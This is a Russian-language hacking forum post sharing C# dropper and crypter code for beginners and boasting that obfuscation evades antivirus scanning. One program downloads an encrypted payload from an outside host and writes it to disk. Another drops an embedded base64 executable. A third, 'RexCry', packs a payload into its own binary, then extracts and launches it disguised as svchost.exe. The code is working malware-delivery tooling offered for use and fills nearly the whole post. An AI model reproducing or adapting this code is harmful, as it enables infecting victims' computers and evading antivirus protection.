Есть два простеньких методов дропа, можете осуждать, может новичкам пригодится
конвертируете base64, где то около 5 антивирусов считают метод вредоносным в проактиве(eset,avira,и другие) обфускация сильно защищает от скантайма, впрочем можно назвать лоадером, простая реализация Writeallbyte для тех кто только вошел в сферу, конечно для тех кто чуть более шарит дерьмо, но для новичкам более менее
самое простое
чуть по сложнее структурой... C BASE64 не связан просто скинул...
конвертируете base64, где то около 5 антивирусов считают метод вредоносным в проактиве(eset,avira,и другие) обфускация сильно защищает от скантайма, впрочем можно назвать лоадером, простая реализация Writeallbyte для тех кто только вошел в сферу, конечно для тех кто чуть более шарит дерьмо, но для новичкам более менее
У вас должно быть более 2 реакций для просмотра скрытого контента.
C#:
using System;
using System.IO;
using System.Linq;
using System.Net;
using System.Security.Cryptography;
using System.Text;
namespace PsevdoSoftware
{
public static class sEncrypt
{
// This constant is used to determine the keysize of the encryption algorithm in bits.
// We divide this by 8 within the code below to get the equivalent number of bytes.
private const int Keysize = 256;
// This constant determines the number of iterations for the password bytes generation function.
private const int DerivationIterations = 1000;
public static string Encrypt(string plainText, string passPhrase)
{
// Salt and IV is randomly generated each time, but is preprended to encrypted cipher text
// so that the same Salt and IV values can be used when decrypting.
var saltStringBytes = Generate256BitsOfRandomEntropy();
var ivStringBytes = Generate256BitsOfRandomEntropy();
var plainTextBytes = Encoding.UTF8.GetBytes(plainText);
using (var password = new Rfc2898DeriveBytes(passPhrase, saltStringBytes, DerivationIterations))
{
var keyBytes = password.GetBytes(Keysize / 8);
using (var symmetricKey = new RijndaelManaged())
{
symmetricKey.BlockSize = 256;
symmetricKey.Mode = CipherMode.CBC;
symmetricKey.Padding = PaddingMode.PKCS7;
using (var encryptor = symmetricKey.CreateEncryptor(keyBytes, ivStringBytes))
{
using (var memoryStream = new MemoryStream())
{
using (var cryptoStream = new CryptoStream(memoryStream, encryptor, CryptoStreamMode.Write))
{
cryptoStream.Write(plainTextBytes, 0, plainTextBytes.Length);
cryptoStream.FlushFinalBlock();
// Create the final bytes as a concatenation of the random salt bytes, the random iv bytes and the cipher bytes.
var cipherTextBytes = saltStringBytes;
cipherTextBytes = cipherTextBytes.Concat(ivStringBytes).ToArray();
cipherTextBytes = cipherTextBytes.Concat(memoryStream.ToArray()).ToArray();
memoryStream.Close();
cryptoStream.Close();
return Convert.ToBase64String(cipherTextBytes);
}
}
}
}
}
}
public static string Decrypt(string cipherText, string passPhrase)
{
// Get the complete stream of bytes that represent:
// [32 bytes of Salt] + [32 bytes of IV] + [n bytes of CipherText]
var cipherTextBytesWithSaltAndIv = Convert.FromBase64String(cipherText);
// Get the saltbytes by extracting the first 32 bytes from the supplied cipherText bytes.
var saltStringBytes = cipherTextBytesWithSaltAndIv.Take(Keysize / 8).ToArray();
// Get the IV bytes by extracting the next 32 bytes from the supplied cipherText bytes.
var ivStringBytes = cipherTextBytesWithSaltAndIv.Skip(Keysize / 8).Take(Keysize / 8).ToArray();
// Get the actual cipher text bytes by removing the first 64 bytes from the cipherText string.
var cipherTextBytes = cipherTextBytesWithSaltAndIv.Skip((Keysize / 8) * 2).Take(cipherTextBytesWithSaltAndIv.Length - ((Keysize / 8) * 2)).ToArray();
using (var password = new Rfc2898DeriveBytes(passPhrase, saltStringBytes, DerivationIterations))
{
var keyBytes = password.GetBytes(Keysize / 8);
using (var symmetricKey = new RijndaelManaged())
{
symmetricKey.BlockSize = 256;
symmetricKey.Mode = CipherMode.CBC;
symmetricKey.Padding = PaddingMode.PKCS7;
using (var decryptor = symmetricKey.CreateDecryptor(keyBytes, ivStringBytes))
{
using (var memoryStream = new MemoryStream(cipherTextBytes))
{
using (var cryptoStream = new CryptoStream(memoryStream, decryptor, CryptoStreamMode.Read))
{
var plainTextBytes = new byte[cipherTextBytes.Length];
var decryptedByteCount = cryptoStream.Read(plainTextBytes, 0, plainTextBytes.Length);
memoryStream.Close();
cryptoStream.Close();
return Encoding.UTF8.GetString(plainTextBytes, 0, decryptedByteCount);
}
}
}
}
}
}
private static byte[] Generate256BitsOfRandomEntropy()
{
var randomBytes = new byte[32]; // 32 Bytes will give us 256 bits.
using (var rngCsp = new RNGCryptoServiceProvider())
{
// Fill the array with cryptographically secure random bytes.
rngCsp.GetBytes(randomBytes);
}
return randomBytes;
}
}
static class Program
{
/// <summary>
/// The main entry point for the application.
/// </summary>
[STAThread]
static void Main()
{
string LocalAppData = Environment.GetEnvironmentVariable("LocalAppData");
string BinLoader = sEncrypt.Decrypt(new WebClient().DownloadString("http://vkbrute.zzz.com.ua/rx/askdjho1ihd2ikjd"), "0"); //ссылка на зашифрованный файл в base64
File.WriteAllBytes(LocalAppData + @"\Temp\exm832.cmd", Convert.FromBase64String(BinLoader));
}
}
}
C#:
using System;
using System.IO;
using System.Diagnostics;
namespace PsevdoSoftware
{
static class Program
{
/// <summary>
/// The main entry point for the application.
/// </summary>
[STAThread]
static void Main()
{
string EncryptedFile = "ваш код base64";
try
{
var dFB = Convert.FromBase64String(EncryptedFile);
File.WriteAllBytes(@"C:\ProgramData\Parasha.exe", dFB);
}
catch
{
}
}
}
}
C#:
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Security.Cryptography;
using System.Text;
using System.Threading.Tasks;
using Microsoft.Win32;
namespace RexCry
{
class Program
{
static byte[] ftocrypt, OBIHAS, bhas12457905137ms;
static string ambopa;
static int bmio124;
static string MiNsp11nvb6 = "==KUTAZ==";
static void Main(string[] args)
{
FileInfo f = new FileInfo(System.AppDomain.CurrentDomain.FriendlyName);
long s1 = f.Length;
Console.WriteLine(s1);
if (s1 > 9216)
{
OBIHAS = File.ReadAllBytes(System.Reflection.Assembly.GetEntryAssembly().Location);
string nfsdfG = Convert.ToBase64String(OBIHAS);
string[] ASDGWa = nfsdfG.Split(new string[] { "PT1LVVRBWj09" }, StringSplitOptions.None);
byte[] nboia = Convert.FromBase64String(ASDGWa[1]);
File.WriteAllBytes(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"/svchost.exe", Convert.FromBase64String(KJKAJSF(nboia)));
System.Diagnostics.Process.Start(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)+ "/svchost.exe");
}
else
{
Console.WriteLine("Write path to file to encrypt:");
ambopa = Console.ReadLine();
ftocrypt = File.ReadAllBytes(ambopa);
OBIHAS = File.ReadAllBytes(System.Reflection.Assembly.GetEntryAssembly().Location);
bhas12457905137ms = asddwg2yh43(OBIHAS, Encoding.ASCII.GetBytes(MiNsp11nvb6));
bhas12457905137ms = asddwg2yh43(bhas12457905137ms, ENCASFD531(ftocrypt));
bmio124 = OBIHAS.Length;
File.WriteAllBytes("file.exe",bhas12457905137ms);
Console.ReadKey();
}
}
public static IEnumerable<int> PatternAt(byte[] source, byte[] pattern)
{
for (int i = 0; i < source.Length; i++)
{
if (source.Skip(i).Take(pattern.Length).SequenceEqual(pattern))
{
yield return i;
}
}
}
static byte[] asddwg2yh43(byte[] arrayA, byte[] arrayB)
{
byte[] outputBytes = new byte[arrayA.Length + arrayB.Length];
Buffer.BlockCopy(arrayA, 0, outputBytes, 0, arrayA.Length);
Buffer.BlockCopy(arrayB, 0, outputBytes, arrayA.Length, arrayB.Length);
return outputBytes;
}
static byte[] ENCASFD531(byte[] tobyas)
{
string bs56721 = Convert.ToBase64String(tobyas);
string eckasdf = MASFGKU.NBOASaa(bs56721, "1234");
byte[] bnpiwro = Encoding.ASCII.GetBytes(eckasdf);
return bnpiwro;
}
static string KJKAJSF(byte[] asf14na)
{
string BNIOWJNEASGIJDVNL = Encoding.UTF8.GetString(asf14na);
string BNAO = MASFGKU.Bniaod(BNIOWJNEASGIJDVNL, "1234");
return BNAO;
}
}
public static class MASFGKU
{
private const string bnoa = "pemgail9uzpgzl88";
private const int basiop = 256;
public static string NBOASaa(string ABNPA, string PSAWFG)
{
byte[] IBAJSDB = Encoding.UTF8.GetBytes(bnoa);
byte[] aSNOBIA = Encoding.UTF8.GetBytes(ABNPA);
PasswordDeriveBytes ABNIOP = new PasswordDeriveBytes(PSAWFG, null);
byte[] keyBytes = ABNIOP.GetBytes(basiop / 8);
RijndaelManaged NMPOAbmKAOP = new RijndaelManaged();
NMPOAbmKAOP.Mode = CipherMode.CBC;
ICryptoTransform BIONAHIAJIA = NMPOAbmKAOP.CreateEncryptor(keyBytes, IBAJSDB);
MemoryStream MABHIOP = new MemoryStream();
CryptoStream JOPBAJHNOIA = new CryptoStream(MABHIOP, BIONAHIAJIA, CryptoStreamMode.Write);
JOPBAJHNOIA.Write(aSNOBIA, 0, aSNOBIA.Length);
JOPBAJHNOIA.FlushFinalBlock();
byte[] BONAIOBJIOPAADIOBIOA = MABHIOP.ToArray();
MABHIOP.Close();
JOPBAJHNOIA.Close();
return Convert.ToBase64String(BONAIOBJIOPAADIOBIOA);
}
public static string Bniaod(string abnioai, string gbnasj15318)
{
byte[] pyh378efnv7 = Encoding.UTF8.GetBytes(bnoa);
byte[] nbso4314 = Convert.FromBase64String(abnioai);
PasswordDeriveBytes mn954sdvs = new PasswordDeriveBytes(gbnasj15318, null);
byte[] keyBytes = mn954sdvs.GetBytes(basiop / 8);
RijndaelManaged sdggsgd1245s = new RijndaelManaged();
sdggsgd1245s.Mode = CipherMode.CBC;
ICryptoTransform dcvdasbnoi = sdggsgd1245s.CreateDecryptor(keyBytes, pyh378efnv7);
MemoryStream tiegpqoav = new MemoryStream(nbso4314);
CryptoStream bdnoia = new CryptoStream(tiegpqoav, dcvdasbnoi, CryptoStreamMode.Read);
byte[] rhwmnwiavjioaAAAAAAAAAAAAAAAA = new byte[nbso4314.Length];
int BBNAOIJHAUIOHIOAXBHIADJA = bdnoia.Read(rhwmnwiavjioaAAAAAAAAAAAAAAAA, 0, rhwmnwiavjioaAAAAAAAAAAAAAAAA.Length);
tiegpqoav.Close();
bdnoia.Close();
return Encoding.UTF8.GetString(rhwmnwiavjioaAAAAAAAAAAAAAAAA, 0, BBNAOIJHAUIOHIOAXBHIADJA);
}
}
}
Последнее редактирование: